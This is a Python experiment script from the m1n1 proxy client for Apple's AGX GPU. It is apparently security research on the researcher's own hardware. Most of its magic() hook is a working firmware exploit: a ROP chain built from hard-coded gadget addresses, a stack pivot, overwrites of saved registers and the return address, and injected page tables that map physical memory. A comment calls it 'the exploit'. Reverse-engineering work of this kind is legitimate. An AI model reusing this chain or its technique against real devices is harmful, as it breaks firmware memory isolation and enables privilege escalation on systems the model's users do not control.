m1n1/proxyclient/experiments/agx_xtest.py

417 lines
12 KiB
Python
Raw Permalink Normal View History

#!/usr/bin/env python3
# SPDX-License-Identifier: MIT
import sys, pathlib, time
sys.path.append(str(pathlib.Path(__file__).resolve().parents[1]))
import atexit, sys
from m1n1.agx import AGX
from m1n1.agx.render import *
from m1n1.fw.agx.microsequence import *
from construct import *
from m1n1.setup import *
from m1n1 import asm
# NOTE(review): `p`, `u` and `mon` are not defined in this file; presumably
# they are provided by the `from m1n1.setup import *` star import - confirm.

# Enable the clocks for the two ADT nodes used below before touching the GPU.
p.pmgr_adt_clocks_enable("/arm-io/gfx-asc")
p.pmgr_adt_clocks_enable("/arm-io/sgx")

# Build the AGX driver object and attach the monitor to it so that
# mon.poll() calls later in the script can report on it.
agx = AGX(u)
agx.mon = mon
sgx = agx.sgx_dev
def magic(renderer, work, ms):
    """Microsequence hook: append the experiment's command stream to *ms*.

    This function is installed as ``mshook_ta`` on the GPURenderer further
    down in this file. It does two things:

    1. Allocates a scratch buffer and a 0x400-entry 64-bit "ROP" buffer,
       fills the latter with gadget pointers, argument blocks and fake
       stack frames, and pushes it.
    2. Appends microsequence commands to *ms* that patch runtime values
       into that buffer, save and overwrite a handful of stack slots, and
       finally complete the current command with its real stamp.

    All ``0xffffff80...`` constants are hard-coded addresses.
    NOTE(review): they presumably match one specific firmware build -
    confirm before reusing on anything else.

    Parameters:
        renderer: unused here.
        work: work item; receives a new ``scratch`` buffer attribute.
        ms: microsequence builder; must provide ``append()`` and
            ``cur_addr()``.
    """
    work.scratch = agx.kobj.new_buf(0x4000, name="scratch", track=True)

    # dump GXF area
    #for i in range(0, 0x200, 8):
    #    ms.append(Read64Cmd(0xffffff8000068000 + i))
    #    ms.append(Store64Cmd(work.scratch._addr + i))
    #return

    # --- Hard-coded addresses of variables read by the microsequence ---
    gbl_cur_cmd_state = 0xffffff80000744b0
    v_gptbat_base = 0xffffff800004d06b
    v_kpt_pfn = 0xffffff80000680b0

    g_epilogue = 0xffffff8000021ec0

    # Stack location whose saved-register slots are read and overwritten
    # below; the individual slots are fixed offsets from `sp`.
    sp = 0xffffff80000baab0 + 0x1c0
    v_lr = sp + 0x58
    v_x26 = sp + 0x10
    v_x23 = sp + 0x28
    v_x22 = sp + 0x30
    v_x21 = sp + 0x38

    # --- Gadget addresses (disassembly quoted from the original author) ---
    g_stack_pivot = 0xffffff8000006640
    #0xffffff8000006640 : mov sp, x2 ; movz x0, #0x1 ; ret

    g_calltwo = 0xffffff8000045e24
    # 0xffffff8000045e24 :
    # ldr x8, [x22] ; ldr x8, [x8] ; mov x0, x22 ; movz w1, #0x5 ; mov x2, x23 ; mov x3, #0x0 ; blr x8 ;
    g_callone = 0xffffff8000045e3c
    # ldr x8, [x21, #0x70] ; cbz x8, #0xffffff8000045e4c ; mov x0, x26 ; blr x8
    # mov x0, x23 ;
    # ldp x29, x30, [sp, #0x80] ;
    # ldp x20, x19, [sp, #0x70] ;
    # ldp x22, x21, [sp, #0x60] ;
    # ldp x24, x23, [sp, #0x50] ;
    # ldp x26, x25, [sp, #0x40] ;
    # ldp x28, x27, [sp, #0x30] ;
    # ldp d9, d8, [sp, #0x20] ;
    # add sp, sp, #0x90 ; ret

    g_store = 0xffffff800003b310
    # 0xffffff800003b310 : str x0, [x23, #0xa78] ; ldp x29, x30, [sp, #0x40] ; ldp x20, x19, [sp, #0x30] ; ldp x22, x21, [sp, #0x20] ; ldp x24, x23, [sp, #0x10] ; ldp x26, x25, [sp], #0x50 ; ret

    g_mmu_gxf_enter = 0xffffff8000006650

    # --- ROP buffer: ROP_SIZE 64-bit little-endian words ---
    # `rop` is the Python-side image; `p_rop` is the buffer's address, so
    # the address of entry i is p_rop + 8 * i.
    ROP_SIZE = 0x400
    rbuf = agx.kobj.new(Array(ROP_SIZE, Int64ul), name="ROP", track=True)
    p_rop = rbuf._addr
    rop = []

    def r(i):
        """Append one 64-bit value to the ROP image; return its address."""
        p = p_rop + len(rop) * 8
        rop.append(i)
        return p

    def e(v):
        """Append a list of 64-bit values; return the address of the first."""
        p = p_rop + len(rop) * 8
        rop.extend(v)
        return p

    # Slot 0 doubles as a temporary: the microsequence stores the current
    # command buffer pointer here (see Store64Cmd(tmp_cmdbuf) below).
    tmp_cmdbuf = r(0)

    # Pointers (and one pointer-to-pointer) to gadgets. g_callone loads its
    # target from [x21 + 0x70], which is why frames use `pg_* - 0x70`;
    # g_calltwo dereferences x22 twice, hence ppg_stack_pivot.
    pg_stack_pivot = r(g_stack_pivot)
    ppg_stack_pivot = r(pg_stack_pivot)
    pg_store = r(g_store)
    pg_epilogue = r(g_epilogue)
    pg_mmu_gxf_enter = r(g_mmu_gxf_enter)

    v_ttbrs = 0xffffff8001000000
    # 16 bytes per context entry; this is the entry for context 63.
    v_ttbr1_63 = v_ttbrs + 63 * 16

    # Argument block + operation descriptor for the "map" call. The `pa`
    # slot (second entry) is a placeholder patched by the microsequence.
    gxf_map_args = e([
        v_ttbrs >> 14, # va
        0,             # pa
        1,             # size
        0x41b,         # EL1 RW Shared
        0,             # unk
    ])

    gxf_map_op = e([
        0x10, # map
        gxf_map_args
    ])

    # Argument block + operation descriptor for the "switch" call.
    gxf_switch_args = e([
        63 << 32, # context ID
    ])

    gxf_switch_op = e([
        0x20, # switch
        gxf_switch_args
    ])

    # Pad to an even number of entries so what follows starts on a
    # 16-byte boundary relative to p_rop.
    if len(rop) & 1:
        r(0)

    # Low leaf PT for firmware
    v_kpt0 = 0xffffff8001fc8000

    # New page tables (AGX heap scratch)
    # Actually make this the TTBR page lol
    v_new_pt = 0xffffff80000b4000

    # --- Fake stack frames ---
    # Values of the form 0xNaaaaaaaaa0000xx / 0xNbbbbbbbbb0000xx are
    # recognisable filler for slots whose contents do not matter; the
    # trailing digits name the slot/register they land in.
    # new_sp and new_ttbr are contiguous: together they form the frame
    # consumed by the g_callone epilogue (0x90 bytes = 18 entries).
    new_sp = e([
        # Set the TTBR1 for context 63
        # Coming from g_calltwo
        0x0aaaaaaaaa000006,
        0x0aaaaaaaaa000007,
        0x0aaaaaaaaa000008,
        0x0aaaaaaaaa000009,
        0x0aaaaaaaaa00000a,
        0x0aaaaaaaaa00000b,
        0x0bbbbbbbbb000028, # x28
        0x0bbbbbbbbb000027, # x27
    ])
    # The first entry here is a placeholder that the microsequence
    # overwrites with the computed TTBR value (Store64Cmd(new_ttbr)).
    new_ttbr = e([
        0x1bbbbbbbbb000026, # x26 = x0 = value
        0x1bbbbbbbbb000025, # x25
        0x1bbbbbbbbb000024, # x24
        v_ttbr1_63 - 0xa78, # x23 = addr
        0x1bbbbbbbbb000022, # x22
        pg_store - 0x70,    # x21 = func
        0x1bbbbbbbbb000020, # x20
        0x1bbbbbbbbb000019, # x19
        0x1bbbbbbbbb000029, # x29
        g_callone,          # lr

        # Switch to context 63
        # Coming from g_store
        gxf_switch_op,      # x26 = x0 = op
        0x2bbbbbbbbb000025, # x25
        0x2bbbbbbbbb000024, # x24
        0x2bbbbbbbbb000023, # x23
        0x2bbbbbbbbb000022, # x22
        pg_mmu_gxf_enter - 0x70, # x21 = func
        0x2bbbbbbbbb000020, # x20
        0x2bbbbbbbbb000019, # x19
        0x2bbbbbbbbb000029, # x29
        g_callone,          # lr

        # Install our page table in the kernel space
        # Coming from g_callone
        0x3aaaaaaaaa000006,
        0x3aaaaaaaaa000007,
        0x3aaaaaaaaa000008,
        0x3aaaaaaaaa000009,
        0x3aaaaaaaaa00000a,
        # NOTE(review): this filler breaks the 0x3a... pattern of its
        # neighbours; it looks like a typo in a don't-care slot.
        0xaaaaaaaaaa00000b,
        0x3bbbbbbbbb000028, # x28
        0x3bbbbbbbbb000027, # x27
    ])
    # Placeholder for the PTE value; patched via Store64Cmd(ktp_pte_val).
    ktp_pte_val = e([
        0x3bbbbbbbbb000026, # x26 = x0 = value
        0x3bbbbbbbbb000025, # x25
        0x3bbbbbbbbb000024, # x24
    ])
    # Placeholder for the PTE address; patched via Store64Cmd(kpt_pte_addr).
    kpt_pte_addr = e([
        0x3bbbbbbbbb000023, # x23 = addr
        0x3bbbbbbbbb000022, # x22
        pg_store - 0x70,    # x21 = func
        0x3bbbbbbbbb000020, # x20
        0x3bbbbbbbbb000019, # x19
        0x3bbbbbbbbb000029, # x29
        g_callone,          # lr
    ])

    def restore_reg(p):
        """Append a g_store frame that writes a saved value back to *p*.

        Returns the address of the frame's first entry, which is the
        "value" slot; the microsequence fills it with the original
        contents of *p* before they are overwritten.
        """
        return e([
            # Restore x21
            # Coming from g_store
            0x4bbbbbbbbb000026, # x26 = x0 = value
            0x4bbbbbbbbb000025, # x25
            0x4bbbbbbbbb000024, # x24
            p - 0xa78,          # x23 = addr
            0x4bbbbbbbbb000022, # x22
            pg_store - 0x70,    # x21 = function
            0x4bbbbbbbbb000020, # x20
            0x4bbbbbbbbb000019, # x19
            0x4bbbbbbbbb000029, # x29
            g_callone,          # lr
        ])

    # One restore frame per stack slot that gets overwritten below. The
    # order of these calls fixes the order of the frames in the buffer.
    save_x21 = restore_reg(v_x21)
    save_x22 = restore_reg(v_x22)
    save_x23 = restore_reg(v_x23)
    save_x26 = restore_reg(v_x26)
    save_lr = restore_reg(v_lr)

    e([
        # Return to original stack
        # Coming from g_store
        0,                  # x26 = r0 = ret
        0x5bbbbbbbbb000025, # x25
        0x5bbbbbbbbb000024, # x24
        sp,                 # x23 = new sp
        ppg_stack_pivot,    # x22 = 1st function
        pg_epilogue - 0x70, # x21 = 2nd function
        0x5bbbbbbbbb000020, # x20
        0x5bbbbbbbbb000019, # x19
        0x5bbbbbbbbb000029, # x29
        g_calltwo,          # lr
    ])

    print(f"ROP len: {len(rop)*8:#x}")

    # Zero-pad the image to the full array length and upload it.
    rbuf.val = rop + [0] * (ROP_SIZE - len(rop))
    rbuf.push()

    # --- Microsequence ---
    # NOTE(review): the Read*/ALU/Add16/Store64 commands appear to operate
    # on one implicit accumulator (read -> modify -> store) - confirm
    # against m1n1.fw.agx.microsequence.

    # Calculate pfn of the ttbr base
    # vpg_ttbrs is the address of the `pa` slot (entry 1) of gxf_map_args.
    vpg_ttbrs = gxf_map_args + 8
    ms.append(Read64Cmd(v_gptbat_base))
    ms.append(ALUCmd(ALUCmd.LSR, 14))
    ms.append(Store64Cmd(vpg_ttbrs))

    # Calculate physaddr of the kpte to overwrite
    # The XOR / add / XOR sequence computes ~(~x + k), i.e. x - k: the
    # 0xa78 displacement that g_store adds is pre-subtracted, leaving a net
    # offset of +8*4 from the shifted pfn.
    ms.append(Read64Cmd(v_kpt_pfn))
    ms.append(ALUCmd(ALUCmd.LSL, 14))
    ms.append(ALUCmd(ALUCmd.XOR, 0xffffffffffffffff))
    ms.append(Add16Cmd(0xa78 - 8 * 4))
    ms.append(ALUCmd(ALUCmd.XOR, 0xffffffffffffffff))
    ms.append(Store64Cmd(kpt_pte_addr))

    # Read the page tables to find the paddr of our new PT,
    # and generate the PTE and TTBR
    # pt[0] -> self reference L1 -> L2
    # The entry index is bits [24:14] of v_new_pt; the same masked value is
    # reused with different low bits for the TTBR (|1) and the PTE (|1|2).
    ms.append(Read64Cmd(v_kpt0 + ((v_new_pt >> 14) & 0x7ff) * 8))
    ms.append(ALUCmd(ALUCmd.AND, 0xfffffffc000))
    ms.append(ALUCmd(ALUCmd.OR, 1))
    ms.append(Store64Cmd(new_ttbr))
    ms.append(ALUCmd(ALUCmd.OR, 2))
    ms.append(Store64Cmd(ktp_pte_val))
    ms.append(Store64Cmd(v_new_pt))

    # Map physical 32M pages at 0, 32M, 8G-32, 16G-32
    # This should be enough to make the exploit work regardless of RAM size,
    # the shader can map the rest
    for page in (0, 1, 255, 511):
        # pt[0x400+x] -> 0x800000000 + (x<<25)
        ms.append(Write64Cmd(v_new_pt + 0x2000 + 8 * page, 0xe0000800000409 | (page<<25)))

    # Save the stack values we will clobber,
    # and construct the new ttbr0 PT
    # Each original value goes into the "value" slot of its restore frame.
    for src, dest in (
        (v_lr, save_lr),
        (v_x21, save_x21),
        (v_x22, save_x22),
        (v_x23, save_x23),
        (v_x26, save_x26),
    ):
        ms.append(Read64Cmd(src))
        ms.append(Store64Cmd(dest))

    # Set up our initial ROP pivot (GXF map TTBRs)
    # v_lr is written last, after the register slots it depends on.
    ms.append(Write64Cmd(v_x21, pg_mmu_gxf_enter - 0x70))
    ms.append(Write64Cmd(v_x22, ppg_stack_pivot))
    ms.append(Write64Cmd(v_x23, new_sp))
    ms.append(Write64Cmd(v_x26, gxf_map_op))
    ms.append(Write64Cmd(v_lr, g_calltwo))

    # Figure out the stamp addr/val to complete the current command
    # The pattern used three times below is a pointer dereference done by
    # self-patching: a Store64Cmd is pointed at the `addr` field of the
    # read command appended right after it, so the value computed at run
    # time becomes the address that read uses.
    ms.append(Read64Cmd(gbl_cur_cmd_state))
    ms.append(Add16Cmd(0x10))
    store_cmd_buf = Store64Cmd(0)
    ms.append(store_cmd_buf)
    store_cmd_buf.addr = ms.cur_addr() + Read64Cmd.offsetof("addr")
    ms.append(Read64Cmd(0))
    # Clear the low 5 bits and keep the result in ROP slot 0 for reuse.
    ms.append(ALUCmd(ALUCmd.AND, 0xffffffffffffffe0))
    ms.append(Store64Cmd(tmp_cmdbuf))

    # Offsets into the command buffer; only the two TA addr/value offsets
    # are used below, the rest are kept for reference.
    off_3d_stamp_addr = 0x8d8
    off_3d_stamp_value = 0x8e0
    off_3d_stamp_index = 0x8e4

    off_ta_stamp_addr = 0x578
    off_ta_stamp_value = 0x580
    off_ta_stamp_index = 0x584

    # Fetch the 64-bit stamp address ...
    ms.append(Add16Cmd(off_ta_stamp_addr))
    store = Store64Cmd(0)
    ms.append(store)
    store.addr = ms.cur_addr() + Read64Cmd.offsetof("addr")
    ms.append(Read64Cmd(0))

    # ... and park it in the CompleteCmd appended further down; the target
    # address of this store is filled in once that command's position is
    # known.
    store_stamp_addr = Store64Cmd(0)
    ms.append(store_stamp_addr)

    # Same again for the stamp value, which is read as 32 bits.
    ms.append(Read64Cmd(tmp_cmdbuf))
    ms.append(Add16Cmd(off_ta_stamp_value))
    store = Store64Cmd(0)
    ms.append(store)
    store.addr = ms.cur_addr() + Read32Cmd.offsetof("addr")
    ms.append(Read32Cmd(0))

    store_stamp_val = Store64Cmd(0)
    ms.append(store_stamp_val)

    ms.append(DoorbellCmd(1))

    # Now that the CompleteCmd's address is known, point the two pending
    # stores at its stamp fields; the zeros below are run-time placeholders.
    off = ms.cur_addr()
    store_stamp_addr.addr = off + CompleteCmd.offsetof("stamp_addr")
    store_stamp_val.addr = off + CompleteCmd.offsetof("stamp_val")
    cmd = CompleteCmd()
    cmd.stamp_addr = 0
    cmd.stamp_val = 0
    ms.append(cmd)

    #off = ms.cur_addr()
    #store_stamp_addr.addr = off + AbortCmd.offsetof("stamp_addr")
    #store_stamp_val.addr = off + AbortCmd.offsetof("stamp_val")
    #cmd = AbortCmd()
    #cmd.stamp_addr = 0
    #cmd.stamp_val = 0
    #ms.append(cmd)

    # NOTE(review): trailing write to address 0xdead after the completion
    # command; its purpose is not evident from this file - confirm.
    ms.append(Write64Cmd(0xdead, 0))
# Driver: start the GPU firmware, submit one frame with the magic() hook
# installed, pump the firmware until the TA event fires, then poke it a few
# more times and submit again. The machine is rebooted on the way out
# whether or not anything above raised.
try:
    agx.start()
    #agx.uat.dump(0)

    print("==========================================")
    print("## After init")
    print("==========================================")
    mon.poll()
    agx.poll_objects()

    ctx = GPUContext(agx)
    ctx.bind(2)

    # The first command-line argument is passed to GPUFrame.
    # NOTE(review): presumably a path to a captured frame - confirm.
    f = GPUFrame(ctx, sys.argv[1], track=False)

    r = GPURenderer(ctx, 8, bm_slot=0x10, queue=1)
    print("==========================================")
    print("## Submitting")
    print("==========================================")

    # Install the hook before submitting so it applies to this submission.
    r.mshook_ta = magic

    w = r.submit(f.cmdbuf)

    print("==========================================")
    print("## Submitted")
    print("==========================================")

    mon.poll()
    agx.poll_objects()

    print("==========================================")
    print("## Run")
    print("==========================================")

    r.run()

    # Busy-pump the firmware until the renderer's TA event has fired.
    while not r.ev_ta.fired:
        agx.asc.work()
        agx.poll_channels()

    #r.wait()

    agx.poll_objects()

    print("==========================================")
    print("## Scratch")
    print("==========================================")
    #chexdump(w.scratch.pull().val)
    #print(hex(w.scratch.pull().val))
    #open("68000.dump", "wb").write(w.scratch.pull().val)

    # Give the firmware time to settle, kick it, and drain its channels.
    time.sleep(1)
    agx.poll_channels()
    agx.kick_firmware()
    agx.asc.work()
    agx.asc.work()
    agx.poll_channels()

    #agx.asc.crash.crash_hard()
    #agx.poll_channels()
    time.sleep(1)
    agx.poll_channels()
    agx.asc.work()
    agx.asc.work()
    agx.poll_channels()

    # Submit the same command buffer a second time on the same renderer.
    w = r.submit(f.cmdbuf)
    r.run()
    time.sleep(1)
    agx.poll_channels()

finally:
    mon.poll()
    agx.poll_objects()

    # Drop cached translations, then print the translation of
    # 0xffffff8001000000 in context 0 - the same address magic() uses as
    # v_ttbrs.
    agx.uat.invalidate_cache()
    print(repr(agx.uat.iotranslate(0, 0xffffff8001000000, 0x10)))

    #print("UAT dump:")
    #agx.uat.dump(0)

    #print(f"Val: {p.read64(0x810000000):#x}")

    # Always reboot the target so it is not left in a modified state.
    p.reboot()